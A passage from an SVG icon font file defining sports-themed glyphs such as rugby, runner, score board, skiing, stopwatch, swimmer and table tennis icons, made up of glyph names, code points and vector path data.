13 25 22 51 43 78 65 6-18-2-24-10-31z m-20 82c-29-20-55-45-81-68-11-10-19-11-27 2-7 10-19 17-2 31 47 37 92 76 140 117 9-38-1-62-30-82z m-160-2c-2 3-4 6-7 8 65 55 130 111 195 166l7-9-195-165z m301-499c-17 3-45-8-45 26-1 217 0 435-1 652 0 33 26 19 41 23 21 5 17-11 17-23 0-110 0-220 0-330 0-108 0-217 0-325-1-8 9-27-12-23z m364 34c0-23-30-43-52-34-12 5-6 16-6 24-1 139-1 278 0 418 0 5 0 10-1 15v128c1 5 1 10 0 15 0 30 1 60 0 90 0 15 6 18 19 18 36-3 40-8 40-48 0-103 0-206 0-310 0-105 0-210 0-316z m147 337c-2-3-4-5-9-4-10 2-75 62-77 73 0 1 2 3 4 6 27-22 53-43 79-65 3-3 6-6 3-10z m55 65c-5-6-9-20-22-10-38 32-77 63-113 96-15 14-4 34-7 51l7 4c47-39 94-78 141-118 12-10-1-17-6-23z m55 66c-5-6-10 0-14 3-58 49-117 98-175 146-7 6-9 14-5 26 38-32 75-64 112-95 26-22 51-44 77-66 4-4 10-7 5-14z m-584 167c7-6 13 1 17 5 16 16 24 10 39-4 62-60 69-61 130-3 16 15 25 24 43 5 9-9 16-7 17 8 0 24-1 46-25 61-13 8-18 16-22-7-6-37-28-64-61-83-12-7-21-7-33 1-36 23-61 54-66 100-29-16-46-35-41-68 0-5-1-13 2-15z" />
<glyph glyph-name="result-sport" horiz-adv-x="1000" unicode="&#xedc1;" d="M787 103c7 4 13 12 13 21l0 299h11v-95c0-10 8-18 18-18 9 0 17 8 17 18v102c-4 46-57 45-57 45h-83c-60-1-58-45-58-45v-102c0-11 8-19 18-19 10 0 17 8 17 18v95h11l0-298c0-9 6-17 13-21h-86v233h-252v-177h-83c8 4 14 12 14 22l0 299h11v-96c0-10 8-17 18-17 10 0 18 7 18 17v103c-4 46-57 45-57 45h-84c-59-1-57-45-57-45v-103c0-10 8-18 17-18 10 0 18 8 18 18v95h11l0-298c0-10 5-18 14-22h-79v-309h740v253h-83z m-545 78v192h11v-192c0-10 6-18 14-22h-39c8 4 14 12 14 22z m119-311h-211v269h211v-269z m240 0h-211v446h211v-446h0z m141 254v192h10v-192c1-9 6-17 13-21h-36c7 4 13 12 13 21z m108-254h-211v213h211v-213z m-300 196h-36v159h-19c0-5-1-9-4-12-2-3-5-5-8-7-3-2-7-3-13-4-6-1-11-1-16-1v-16h37v-119h-37v-18h96v18z m-231-127h-95c8 7 16 14 25 22 9 8 18 16 27 24 5 6 11 11 15 16 4 5 7 9 11 14 3 6 5 11 7 17 2 6 3 12 3 19 0 15-5 26-16 35-10 9-24 13-42 13-9 0-18-1-28-3-9-2-17-5-22-8v-25c9 6 17 9 26 12 8 2 16 4 23 4 11 0 19-3 25-8 6-5 9-12 9-22 0-10-2-19-8-28-6-8-16-20-31-35-7-7-15-14-24-21-8-7-16-14-25-22v-24h120v20h0z m422-52c10 0 19 2 27 4s15 7 21 13c5 5 9 10 12 17 3 7 4 14 4 22s-1 15-3 20c-3 6-6 10-10 13-3 3-7 6-12 8-5 2-9 3-13 4 9 3 17 8 24 15 7 8 11 16 11 26 0 7-2 13-5 19-3 5-7 10-13 14-5 3-11 6-17 7-7 2-15 3-23 3-9 0-18-2-27-4-10-2-17-5-23-7v-25c9 5 17 8 25 11 9 3 17 4 24 4 5 0 10 0 13-1 4-1 8-2 11-4 4-2 6-5 8-8 2-3 3-7 3-11 0-10-4-17-11-22-7-6-17-8-29-8h-8v-20h10c6 0 12 0 17-1 5-1 9-3 13-5 3-3 6-6 8-10 2-4 3-9 3-16s-1-11-3-16c-1-4-4-8-8-11-3-3-8-6-13-7-6-2-11-3-16-3-9 0-17 2-27 4-9 3-17 7-23 11-2 0-2-24-2-24 6-3 14-6 23-8 10-3 20-4 29-4z m-245 872c25 0 45 21 45 46 0 25-20 45-45 45-25 0-45-20-45-45 0-25 20-46 45-46z m-9-397v210h12v-210c0-15 12-26 26-26 14 0 25 11 25 26l0 313 112 115c7 7 7 19 0 27s-20 7-27 0c0 0-72-72-72-72h-139l-72 72c-8 7-20 7-27 0-8-8-8-20 0-27 0 0 111-114 111-114l-1-314c0-14 12-26 26-26 15 0 26 11 26 26z m-237 183c23 0 42 19 42 42 0 23-19 42-42 42-23 0-42-19-42-42 0-23 19-42 42-42z m500-57c23 0 41 19 41 42 0 23-18 42-41 42-23 0-42-19-42-42 0-23 19-42 42-42z" />
<glyph glyph-name="rugby-ball" horiz-adv-x="1000" unicode="&#xedc2;" d="M398 309c-19 20-19 32 0 51 81 82 173 147 293 168-33 25-61 53-96 71-33 16-69 22-106 12-44-13-85-36-137-29 11-17 23-26 39-30 21-6 42-2 63 1 17 3 32-5 36-19 4-13-3-27-18-35-18-9-37-9-55-1-18 8-36 17-54 26-32 15-61 9-86-16-17-17-34-33-64-36 16-9 27-10 40-8 16 4 32 8 48 2 16-7 22-25 12-39-9-13-24-18-41-13-11 3-21 7-31 12-36 17-71 14-106-4-19-11-38-21-57-32-13-9-27-9-41-3-12 6-23 14-37 23 9-33 26-55 57-63 22-5 43 2 62 13 11 6 22 13 35 12 11-1 19-6 18-18-1-13-9-17-20-16-5 0-11 3-17 4 12-24 39-33 62-19 10 6 21 14 34 14 12 0 23-1 29-13 6-11 5-22-2-32-8-11-19-14-32-11-16 4-30 12-44 19-24 13-48 10-70-12 40 2 66-20 90-44 3-2 5-4 7-6 20-12 40-14 61-4 10 5 20 12 30 17 11 7 23 10 36 6 23-6 36-23 30-41-5-17-21-22-45-15-21 7-42 7-63-1-19-7-33-19-40-38 5-3 8 0 11 1 22 6 42 6 62-8 9-7 20-11 31-16 42-17 66-12 97 22 6 6 13 13 19 19 9 8 20 9 30 3 8-4 13-10 12-20-2-12-11-16-21-19-12-4-24-6-35-10-17-5-24-16-22-34 28 14 56 12 84-1 38-16 76-21 116-8 32 10 59 27 85 51-17 4-32 7-47 11-96 29-173 86-242 156z m475 125c0 9-2 14-10 18-91 46-182 46-273 0-7-4-10-9-9-17 0-33 0-67 0-100 0-34 0-68 0-102-1-8 2-11 9-15 91-47 181-47 272-1 8 5 11 9 11 18 0 66 0 133 0 199z m-38-98c-1-9 2-21-13-19-12 2-17-3-15-15 1-7-3-10-10-10-7 0-9 4-9 10 0 5 3 13-3 14-7 2-15 2-22 1-6-2-3-8-3-13-1-6 0-12-10-12s-10 6-9 12c2 13-4 14-14 13-10 0-17 0-15-13 1-6 0-12-8-12-10-1-11 5-10 12 2 13-5 13-15 13-10 1-16-1-14-13 1-6 0-12-9-12-10 0-10 6-9 13 1 9-2 13-12 12-16 0-16 1-16 19-3 12 2 18 16 16 10-2 12 3 12 12 0 6-2 13 8 14 11 0 11-7 10-14-2-13 6-12 15-12 9-1 16 0 14 13-1 6-1 13 9 13 9 0 10-6 9-13-2-12 4-14 14-13 9 0 17 0 15 13-1 7 0 13 9 13 10 0 10-7 9-13-1-12 5-13 15-13 10 0 16 2 14 14-1 7 1 12 10 12 9-1 10-6 9-12-2-12 4-15 15-14 13 2 13-7 13-16z m157 20c-21 22-45 42-72 61v-164c27 18 50 38 72 60 11 12 11 31 0 43z m-532-40c21-24 46-44 74-64v165c-27-19-51-38-72-61-11-11-12-28-2-40z m-329-87c-26 15-52 8-80-10 27-4 48-12 68-23 27-15 66-6 81 16-25-2-47 4-69 17z m-2 267c19 11 38 17 60 17-19 15-40 25-63 15-20-10-39-20-64-23 24-15 46-20 67-9z" />
<glyph glyph-name="rugby-player" horiz-adv-x="1000" unicode="&#xedc3;" d="M993 100c-15 21-29 43-43 65-21 32-21 32 11 54 12 9 26 15 21 35-26 105-85 185-179 240-13 7-25 7-38 2-54-20-107-40-160-60-10-4-19-8-22-20-13-48-124-63-157-13-17 27-38 36-64 45-40 15-80 29-120 46-21 8-37 5-56-6-75-46-127-111-157-193-20-54-19-55 27-87 14-9 13-15 5-27-19-26-36-54-54-81-9-13-11-22 5-32 32-19 63-40 93-61 15-11 24-6 32 8 15 24 33 47 47 72 13 25 33 41 61 48 4-18 10-36 27-48 6-4 8-11 9-19 8-51 9-103 2-154-3-23 1-30 25-30 112 1 225 1 337 1 74 0 74 0 67 72-3 35 3 70 5 106 0 23 28 30 30 49 4 29 16 22 33 13 12-6 20-14 27-24 19-30 39-59 58-89 8-12 15-15 27-6 32 21 64 43 96 62 16 10 14 19 5 32z m-511 72c3-22-13-32-30-39-6-3-15 0-23-1-9-2-25 8-27-10-1-12-7-29 5-34 10-5 27-11 37 8 5 12 18 7 28 6 13-1 9-13 9-20 2-36 2-36-33-36-7 0-14 0-20 0-12 0-23-1-35 0-20 1-31 12-31 32-1 13 0 27 0 40 0 42 11 55 53 54 21-1 31 4 27 26-1 7 3 17-7 20-9 2-25 5-29-2-10-19-24-16-38-13-10 3-6 15-6 23 1 18 15 29 29 31 21 4 45 6 64-1 42-15 22-54 27-84z m59-65c1-7-4-19 8-21 11-1 26-7 32 5 8 19 25 14 33 10 16-10 6-30 6-45 0-17-15-9-24-10-9-1-19 0-29 0s-19 0-28 0c-27-2-39 11-37 37 0 12 0 25 0 37 0 41 10 53 52 52 18 0 32 1 28 25-1 8 4 19-8 21-10 1-25 6-29-3-9-20-24-14-37-12-10 2-6 14-6 22-1 17 12 29 25 31 22 4 45 5 67 1 24-4 35-44 27-93-4-22-21-32-44-32-16 0-41 9-36-25z m-181 480c15 3 21-5 24-20 4-28 16-54 35-77 40-48 100-54 146-15 28 24 45 55 51 90 4 19 11 24 28 23 11-1 20 1 24 14 30 81-39 198-123 210-14 3-18-1-18-16 1-21-1-43 0-65 2-19-7-20-23-22-27-2-39 6-34 34 1 7 0 14 0 20 0 9 0 17 0 26 0 30-1 31-30 20-76-27-127-113-112-191 3-17 7-34 32-31z" />
<glyph glyph-name="rugby" horiz-adv-x="1000" unicode="&#xedc4;" d="M640 680c-12 12-21 16-37 8-52-26-53-26-19-71 2-2 4-4 5-6 5-5 6-12 1-17-6-7-14-8-21-2-12 10-24 20-34 32-10 12-19 11-32 3-40-26-40-25-7-59 6-6 12-11 16-17 6-7 7-15 0-21-7-7-15-4-21 1-10 10-21 19-30 30-28 34-43 0-59-12-24-17 4-24 10-35 8-15 42-25 24-44-19-20-31 12-43 23-18 18-31 27-53 4-24-25 1-32 10-46 9-15 43-25 24-44-20-19-30 14-44 24-15 9-22 33-46 8-22-23-14-36 5-52 9-8 17-17 25-25 5-6 5-12 0-18-6-6-13-8-20-2-7 6-13 13-20 19-32 32-36 31-60-7-17-27 13-31 21-46 8-15 42-25 23-44-20-20-29 16-44 23-11 6-15 25-30 20-24-7-37-70-20-88 101-101 202-203 303-304 7-7 12-17 25-16 6 2 12 4 18 7 208 84 347 235 433 439 8 17 4 28-9 41-98 97-196 196-294 294z m-525-411c1-1 3-1 7-3 4 6 8 11 11 17 15 28 49 56 1 86-8 5-7 13 1 20 9 7 16 1 23-5 10-6 13-25 31-14 26 16 29 45 9 67-7 9-25 17-10 32 14 13 21-3 29-10 13-10 21-30 42-6 16 18 24 31 1 48-9 6-23 15-11 28 15 17 24 0 31-8 17-22 28-15 46 0 29 25 2 33-9 47-7 8-15 16-4 26 10 9 16 2 23-5 5-4 10-8 14-13 27-31 36 5 52 13 21 11 9 22-1 33-9 9-28 19-12 34 15 14 22-6 31-12 3-2 6-6 9-8 28-29 40 7 56 16 22 11-1 20-7 29-7 12-30 22-13 37 17 15 26-8 36-17 15-13 24-27 48-11 50 32 52 30 9 73-9 8-17 16-25 25-12 14-23 15-41 8-181-71-323-186-407-364-55-115-53-76 30-163z m-54-360c70-71 164-61 253-55-103 105-205 209-310 315-6-93-13-188 57-260z m873 886c-71 66-163 58-249 50 104-105 206-209 312-316 3 97 14 195-63 266z" />
<glyph glyph-name="runner-alt-1" horiz-adv-x="1000" unicode="&#xedc5;" d="M1000 392c0-23-18-42-42-42h-166c-19 0-36 13-41 31l-6 26-24 72-158-100 86-195 12-22c8-13 8-28 0-41-7-13-21-21-36-21h-292c-23 0-41 19-41 42 0 23 18 41 41 41h205l-142 200c-42 59-4 92 41 125l196 121-102 93-189-38c-23-4-45 10-49 33-5 22 10 44 32 49l209 42c11 2 23-1 33-8l157-118c7-2 14-7 22-15l42-71 38-163h132c24 0 42-18 42-41z m-146 250c58 0 104 46 104 104s-46 104-104 104c-57 0-104-47-104-104s47-104 104-104z m-508-721c-17-17-17-42 0-59 8-8 17-12 29-12 13 0 21 4 29 12l217 196h-138l-137-137z m-42 554h-304v-42h292c0 17 4 29 12 42z m150 125h-454v-42h388l66 42z m-129-250h-325v-42h354l-29 42z" />
<glyph glyph-name="runner-alt-2" horiz-adv-x="1000" unicode="&#xedc6;" d="M521 669c50 0 91 41 91 91 0 50-41 90-91 90s-90-40-90-90c0-50 40-91 90-91z m44-343c-68 39-121 64-164 78l0-263-29-139c-9-34 18-52 47-52 28 0 46 19 57 46l28 129v195h23v-419c1-28 23-51 51-51 29 0 52 23 52 51l0 388c-20 11-42 23-65 37z m-385 404l163-167c82-9 178-45 287-106v45l221 228c15 15 15 39 0 54-15 15-39 15-54 0 0 0-143-144-143-144h-277l-143 144c-15 15-39 15-54 0-15-15-15-39 0-54z m450-203c1 0 0-4 0-4v4z m249-108l-81-73c-35 17-85 43-154 84-210 123-374 160-486 108-80-37-112-110-118-147l111-20c0 1 9 43 54 64 43 20 150 33 382-103 164-96 249-132 299-132 27 0 44 11 58 28 22 27 39 76-65 191z" />
<glyph glyph-name="runner" horiz-adv-x="1000" unicode="&#xedc7;" d="M456 279c-18 43-36 85-53 128-4 9-7 3-10 0l-122-95c-34-27-71-24-98 10-50 64-101 128-150 192-32 41-11 95 39 105 26 5 46-6 62-26 36-45 72-91 108-137 4-5 7-6 13-1 39 31 79 61 117 93 21 16 43 28 67 36 70 22 138 45 207 67 40 13 74-3 87-42 26-78 51-156 77-234 9-29 0-57-24-73-22-17-52-17-74-1-13 9-21 21-25 35-18 55-37 110-54 164-3 8-5 10-12 7-30-10-59-20-89-29-6-2-8-4-5-11 49-119 98-238 158-352 6-10 11-21 16-31 2-5 5-7 10-7 36 3 72 5 108 8 40 2 81 5 121 6 34 1 61-25 63-59 2-34-22-64-55-68-34-3-68-5-102-7l-173-11c-33-2-55 13-69 41-26 55-53 108-79 163-4 6-7 7-13 6-56-13-111-25-166-37-7-2-10-5-12-11-25-70-50-140-76-211-11-30-33-47-62-47-42 0-74 40-62 80 12 39 27 77 40 115 18 49 35 97 53 146 9 24 25 39 51 45 61 13 121 27 181 40 2 1 5 2 7 3z m1 443c-3-72-60-128-130-125-74 3-126 65-123 135 4 67 64 121 134 118 66-3 121-62 119-128z" />
<glyph glyph-name="score-board" horiz-adv-x="1000" unicode="&#xedc8;" d="M95 831v-569c0-10 8-19 18-19h32c11 0 19-8 19-18v-340c0-10 8-18 19-18h60c10 0 18 8 18 18v340c0 10 9 18 19 18h433c11 0 19-8 19-18v-356c0-11 9-19 19-19h60c10 0 18 8 18 19v356c0 10 9 18 19 18h39c10 0 18 9 18 19v569c0 11-8 19-18 19h-774c-10 0-18-8-18-19z m734-530h-659c-10 0-18 8-18 18v455c0 10 8 19 18 19h659c11 0 19-9 19-19v-455c0-10-8-18-19-18z m-43 455h-268c-10 0-18-9-18-19v-377c0-11 8-19 18-19h268c10 0 19 8 19 19v377c0 10-8 19-19 19z m-66-216c-5-6-12-8-20-8h-67c-10 0-18-9-18-19v-32c0-10 8-19 18-19h82c3 0 7-1 9-4 3-2 5-6 5-10 0-4-2-7-5-10-2-2-6-4-9-4h-110c-10 0-18 9-18 19v79c0 7 2 14 8 20 5 5 12 8 20 8h67c10 0 18 8 18 19v31c0 10-8 19-18 19h-82c-4 0-8 1-10 4-3 2-4 6-4 10 0 4 1 7 4 10 2 2 6 4 10 4h100c8 0 15-3 20-8 6-6 9-13 9-20v-69c0-8-3-15-9-20z m-497-19h83c3 0 5 1 7 3s3 5 3 7v9c0 3-1 6-3 8-2 2-5 3-7 3h-83c-3 0-5-1-7-3s-3-5-3-8v-9c0-2 1-5 3-7 2-2 4-3 7-3z m114 100c10 0 19-8 19-18v-127c0-11-9-19-19-19h-24c-4 0-7-1-10-4-3-3-4-6-4-10 0-4 1-7 4-10 3-2 6-4 10-4h112c4 0 8 1 10 4 3 3 4 6 4 10v72c0 4-1 7-4 10-2 3-6 4-10 4-4 0-7-1-10-4-2-3-4-6-4-10v-39c0-10-6-19-14-19s-14 9-14 19v155c0 10-8 19-18 19h-52c-3 0-7-2-9-5-3-2-5-6-5-9 0-4 2-8 5-10 2-3 6-4 9-4l24-1z" />
<glyph glyph-name="skiing-man" horiz-adv-x="1000" unicode="&#xedc9;" d="M792 767c0 46 37 83 83 83s83-37 83-83c0-46-37-84-83-84s-83 38-83 84z m-650-55s21-8 37-8c17 0 46 25 46 25l320-209 30-24 92 58v-79c0-13 6-25 16-33l167-125c8-6 16-9 25-9 13 0 25 6 33 17 14 18 10 44-8 58l-150 113v37c6 50 13 108 13 113 0 58-54 79-126 79-88 0-158-44-195-74l-192 116s4 21 0 41c-8 21-25 30-25 30l-33-46-54 21 41-46-37-55z m679-779l-300 171 175 175c9 9 13 21 12 34-1 11-7 21-16 28 0 1-317 230-317 230l-21-29c-29-42-21-105 25-134 46-29 160-87 214-115l-147-146-409 232-37-62 792-450c21-9 50-17 83-17 42 0 96 25 125 71 0 0-66-38-179 12z" />
<glyph glyph-name="skydiving-goggles" horiz-adv-x="1000" unicode="&#xedca;" d="M0 300c0-162 63-262 125-262 63 0 75 83 125 83 63 0 67-209 217-209 208 0 412 184 412 263v196c-658 0-879 125-879 125v-196z m83 75c125-38 346-83 709-88v-108c-17-46-167-183-329-183-34 0-50 25-80 87-25 50-58 121-133 121-62 0-96-41-117-66 0-5-4-5-8-9-17 21-42 79-42 175v71z m917 92c0-188-83-263-83-263v167c58 96 62 375-125 375-75 0-113-125-292-125-137 0-308 83-392-96l-91 33c150 246 350 105 483 105 192 0 163 125 292 125 116 0 208-117 208-321z" />
<glyph glyph-name="snow-mobile" horiz-adv-x="1000" unicode="&#xedcb;" d="M232 232c-60 0-109-49-109-108 0-60 49-109 109-109h612c60 0 108 49 108 109 0 39-21 73-52 92 7 116-8 195-47 237-24 27-49 29-54 29h-547l-97 164h-42l26 1c0 0 1 14 15 28 16 16 50 35 124 35v51c-74 0-128-17-160-50-29-29-30-60-30-65h-13l128-414h29z m285-191h-169v165h169v-165z m212 0h-170v165h170v-165z m198 83c0-46-37-83-83-83h-73v165h73c46 0 83-37 83-82z m-130 307c19-3 60-45 53-199-2 0-4 0-6 0h-446l-117 199h516z m-491-225v-165h-74c-46 0-83 37-83 83 0 45 37 82 83 82h74z m681-239l-1 1c-8 15-28 27-43 27h-794s-24-1-70 36l-54 41c-14 11-25 5-25-12v-5c0-18 11-40 25-51l56-41s12-10 33-17c17-6 45-7 62-7h332c17 0 46 0 63 0 29 0 67 0 67 0h362s-5 12-13 28z" />
<glyph glyph-name="steering" horiz-adv-x="1000" unicode="&#xedcc;" d="M503 850c-275 2-501-222-503-498-2-277 220-501 498-502 279-1 500 218 502 496 1 279-219 502-497 504z m-358-328c76 144 196 216 356 224 159-9 276-80 353-219 19-35 10-48-23-62-54-21-109-37-165-48-26-5-45-2-65 21-55 64-143 64-199 1-23-25-45-28-74-21-56 13-112 28-165 50-28 12-32 27-18 54z m181-526c-105 50-172 135-207 246-10 33-4 47 35 49 166 9 257-75 258-243-6-99-5-91-86-52z m180 234c-67-1-123 53-123 121 0 62 54 116 117 116 64 1 120-56 119-120-1-60-55-115-113-117z m136-250c-34-15-53-12-51 31 1 13 0 26 0 39 0 171 99 259 267 240 27-3 33-10 26-37-36-131-117-220-242-273z m-145 470c-58-2-100-48-98-107 2-52 47-95 100-94 62 1 103 42 103 101-1 59-46 102-105 100z" />
<glyph glyph-name="stopwatch" horiz-adv-x="1000" unicode="&#xedcd;" d="M544 776v21h29v53h-143v-53h25v-21c-109-10-207-59-281-132l-12 12 17 17-20 20-62-62 20-20 18 18 13-12c-70-82-112-187-112-303 0-256 207-464 464-464s464 208 464 464c0 242-184 440-420 462z m-25-849v69c0 11-8 20-19 20-11 0-20-9-20-20v-69c-199 10-357 169-367 368h66c11 0 19 8 19 19 0 11-8 20-19 20h-66c10 199 168 358 367 367 0 0 0-73 0-73 0-11 9-19 20-19 11 0 19 8 19 19v73c199-9 358-168 368-367h-67c-11 0-19-9-19-20 0-11 8-19 19-19h67c-10-199-169-358-368-368z m17 372c1 4 3 8 3 12 0 22-18 39-39 39-22 0-39-17-39-39 0-21 17-39 39-39 2 0 4 1 6 2 0-2 161-141 161-141l43-11-21 44-153 133z" />
<glyph glyph-name="substitute" horiz-adv-x="1000" unicode="&#xedce;" d="M811 435c-26 16-44-2-58-24-37-57-77-113-110-173-28-54-66-67-126-71-77-5-122 22-155 88-23 47-55 90-84 134-18 26-33 73-76 43-37-27 1-56 16-81 74-125 180-235 165-399-9-87-2-102 51-102 129 0 194-1 193 50-4 161 62 267 131 408 10 20 32 51 43 69 11 21 37 41 10 58z m-196-115c-5 50-36 88-99 86-58-2-91-34-93-94-3-66 37-95 94-102 54-6 98 42 98 110z m257 530h-745c-17 0-31-14-31-32v-301c0-18 14-32 31-32h745c17 0 32 14 32 32v301c0 18-15 32-32 32z m0-333h-745v301h745v-301z m-375 40h5c3 0 6 3 6 6v210c0 3-3 5-6 5h-5c-3 0-6-2-6-5v-210c0-3 3-6 6-6z m-247 40c31 0 48 25 48 72 0 44-17 69-45 69-28 0-48-25-48-71 0-45 19-70 45-70z m2 127c19 0 27-22 27-56 0-35-9-57-28-57-17 0-27 20-27 56 0 37 11 57 28 57z m61-90c0-20 18-37 46-37 26 0 47 16 47 39 0 17-11 29-28 36v0c17 8 23 21 23 32 0 17-14 34-40 34-24 0-42-15-42-36 0-12 6-24 21-31l1-1c-17-7-28-19-28-36z m23 69c0 12 9 22 24 22 17 0 23-11 23-22 0-13-9-21-21-25-16 4-26 11-26 25z m21-39c18-5 30-13 30-29 0-15-11-25-27-25-18 0-28 12-28 26 0 13 9 24 25 28z m338-50h-61v1l11 10c28 28 47 48 47 73 0 20-13 40-42 40-16 0-29-6-39-14l6-13c6 5 17 12 29 12 20 0 27-13 27-27 0-21-16-38-51-72l-14-14v-11h87v15z m61 105h0v-120h18v137h-16l-30-16 4-14 24 13z" />
<glyph glyph-name="swimmer" horiz-adv-x="1000" unicode="&#xedcf;" d="M385 321c59-7 114-26 165-50 25-11 51-26 72-38 21-13 42-24 63-34l-129 255-28 48-96 169c-14 24-44 33-68 19-24-14-32-44-18-68l106-187-27-24-167-95c42 9 86 10 127 5z m405 10c51 30 69 95 40 147-30 51-95 69-147 40-51-30-69-95-40-147 30-51 95-69 147-40z m203-80c-15-50-39-97-74-122-33-24-71-25-113-17-41 9-85 27-127 48-22 11-43 22-64 34-20 12-47 27-71 39-51 23-106 42-165 49-59 8-122 3-179-20-57-22-105-61-139-107-32-46-55-98-61-151 64 84 145 145 230 159 84 16 172-10 257-50 23-10 41-20 66-33 24-13 49-25 75-35 52-20 108-36 170-37 30 0 63 5 93 17 31 13 59 35 77 61 35 54 38 113 25 165z" />
<glyph glyph-name="table-tennis" horiz-adv-x="1000" unicode="&#xedd0;" d="M868 738c-149 149-391 149-540 0-149-149-149-390 0-539 149-149 391-149 540 0 149 149 149 390 0 539z m-847-758l89-89 238 238-89 89-238-238z m605 32c-37-37-37-97 0-134 37-37 97-37 134 0 37 37 37 97 0 134-37 38-97 38-134 0z" />
<glyph glyph-name="team-alt" horiz-adv-x="1000" unicode="&#xedd1;" d="M535 537c2-2 4 1 5 3 3 5 8 8 14 10-4-10-3-15 3-19 6-4 11-4 16 0 6 4 7 10 3 19 7-3 13-6 15-13 1-2 2-4 5-3 3 1 2 4 1 6-1 4-4 7-7 9-11 10-31 11-45 4-4-2-8-5-11-10-1-2-2-5 1-6z m-27-116c-6-3-12-2-18 0-4 1-8 2-13 2-10-1-21-4-32-4 8-6 16-10 26-9 5 1 10 1 14-1 9-3 19-4 28 0 5 1 10 1 15 0 8-1 16-1 24 1 1 0 2 0 2 1 1 1-1 2-1 2-9-2-16 3-23 6-8 4-15 5-22 2z m-31 44c9-6 18-7 28-3 9 4 14 12 15 23 0 2 0 5-1 7-1 3-2 6-6 5-4-1-3-4-2-7 3-7 0-12-5-17-7-7-17-7-25 0-3 2-5 3-7 0-2-2-1-4 1-6 0 0 1-1 2-2z m-4-72c11-16 37-17 48-3-16-2-32-3-48 3z m67 176c2 0 5 0 7 1 3 1 6 2 10 4 19 7 41 2 53-12 2 7 1 11-5 15-8 8-19 12-30 12-13 0-26-2-37-8-3-2-5-4-4-7 0-4 3-5 6-5z m318-601c-2 74-7 147-15 221-2 19-8 35-18 49-10 15-23 26-40 35-54 27-113 30-170 42-10 2-9-4-11-11-5-30-19-55-44-73-19-12-40-18-60-19-20 1-41 7-60 19-25 18-39 43-44 73-1 7-1 13-11 11-57-12-116-15-170-42-17-9-30-20-40-35-10-14-16-30-18-49-8-74-13-147-15-221 0-32 14-51 41-63 52-24 108-35 165-43 50-7 101-13 152-12 51-1 102 5 152 12 57 8 113 19 165 43 27 12 41 31 41 63z m-678 8c0-12 1-24-5-36-10 9-8 19-8 28-1 61 5 122 10 183 7 80 28 103 107 121 26 5 51 10 77 14 5 1 12 7 14-2 2-8-6-7-11-8-30-7-61-11-91-20-54-15-78-45-83-102-5-59-10-118-10-178z m595-62c-59-21-172-38-275-40-103 2-215 19-275 40-18 6-27 13-25 34 4 65 7 129 10 193 2 49 22 84 72 96 31 7 62 12 93 19 9 2 12-4 17-10 29-38 69-57 108-57 39 0 79 19 108 57 5 6 8 12 17 10 31-7 62-12 93-19 50-12 70-47 72-96 3-64 6-128 11-193 1-21-7-28-26-34z m50 26c-6 12-5 24-5 36 0 60-5 119-10 178-5 57-29 87-83 102-30 9-60 13-91 20-4 1-13 0-11 8 3 9 9 3 14 2 26-4 51-9 77-14 79-18 100-41 107-121 5-61 11-122 10-183 0-9 3-19-8-28z m-147 208c-1 0-1 0-2 0-8-6-16-11-25-15-5-3-11-5-16-7 0 0 0 0 0-1 0-5 1-10 2-15 0-7 2-15 4-23 3-9 8-17 15-24 3-3 6-6 9-8 4-3 8-6 12-9 0 1 0 1 1 1 6 4 12 9 18 14 6 5 10 11 13 18 5 8 6 18 8 27l1 15 1 5c-5 1-10 3-15 6-9 5-18 10-26 16z m-221 404c-10 5-20 7-31 5-11-2-20-7-24-18-1-2-1-4 1-5 3-1 4 0 5 2 2 8 9 12 17 14-4-9-4-14 1-19 5-4 10-4 15-2 8 5 9 12 5 20 7-2 12-5 15-10 0-2 2-4 4-2 2 1 2 3 1 5-2 4-5 7-9 10z m-126 3c-15-12-17-28-15-46 2-14 9-27 14-40 4-8 10-14 19-17 4-1 3-3 4-6 3-17 8-33 17-48 13-22 31-40 52-54 13-9 25-19 40-25 30-13 60-12 88 4 26 15 50 31 69 54 15 18 27 39 28 63l1 6c0 4 1 6 5 7 11 4 16 13 20 23 4 12 9 22 12 34v15c-2 4-3 9-4 14-3 7-7 14-15 18-2 1-2 3-2 5-1 14 2 27 3 40 4 36-2 70-16 103-4 8-9 16-10 25 0 3-2 4-5 4-6 1-9 5-12 11 0 1-1 3 0 5 4 3 1 4-2 4-5 2-10 1-15 1-3-1-4 0-5 3 0 5-2 10-4 14-1 3-2 4-5 3-10-2-19-2-28 2-5 3-8 7-10 12-4 10-9 17-21 18-3 1-3 3-3 5 0 5 0 11 0 18-5-3-9-6-14-8-7-3-9-1-9 6 0 8 3 15 6 22h-4c-8-3-16-6-21-14-1-3-3-5-4-8-4 7 1 13 4 20-14-4-24-12-32-23-6-6-10-13-15-19-3-4-4-4-6 0-1 1-1 3-2 4 0 1 0 2-1 3-4-2-6-5-8-9-4-7-7-14-10-22-4-8-7-9-15-3-1 0-2 1-2 2-6 5-6 5-12-1-10-11-16-24-23-37-4-8-9-14-16-20-4-5-9-10-14-14 3-2 5-2 7-2 6-1 7-2 5-7-4-10-10-19-15-29l-2-5c2 0 4 2 5 2 2 0 4 1 5 0 1-2 0-3-1-4-4-13-9-25-13-37 1-2 2 0 3 0 6 2 6 2 6-4-1-21-2-42 0-63 0-2 0-3-2-5z m4-16c3-8 4-16 5-23 1-5 9-9 14-8 2 1 1 3 1 4 0 6-1 12-1 18-3 28 3 56 9 83 4 20 8 39 14 58 2 6 4 12 7 18 6 14 17 19 32 20 14 1 28-1 41-4 18-5 35-4 53 1 14 5 28 6 43 7 17 0 28-8 38-20 10-14 16-30 22-46 5-13 10-25 16-37 1-2 2-4 3-5 10-10 11-23 11-36 1-16 1-33 1-49 0-3-1-6 4-6 4 0 8-1 8 5 1 8 2 16 3 24 5-2 7-6 8-10 4-11 4-22 0-33-3-7-6-14-9-21-1-4-4-8-8-11-2-1-4-3-6-2-7 2-8-2-8-7-2-8-3-17-4-25-3-16-10-30-20-42-21-27-49-48-80-61-26-11-53-8-77 8-16 10-32 21-46 34-24 21-37 48-42 78-1 3-1 5-2 7-1 5-1 10-9 8-5-1-10 4-12 9-5 12-11 23-14 36-2 10 0 19 5 28z m66 34c5 2 10 3 15 3 12 2 23-1 33-6 7-2 13-1 15 3 2 4-1 7-9 10-12 5-24 7-36 6-10-1-19-5-27-12-4-4-6-9-5-16 4 6 8 10 14 12z" />
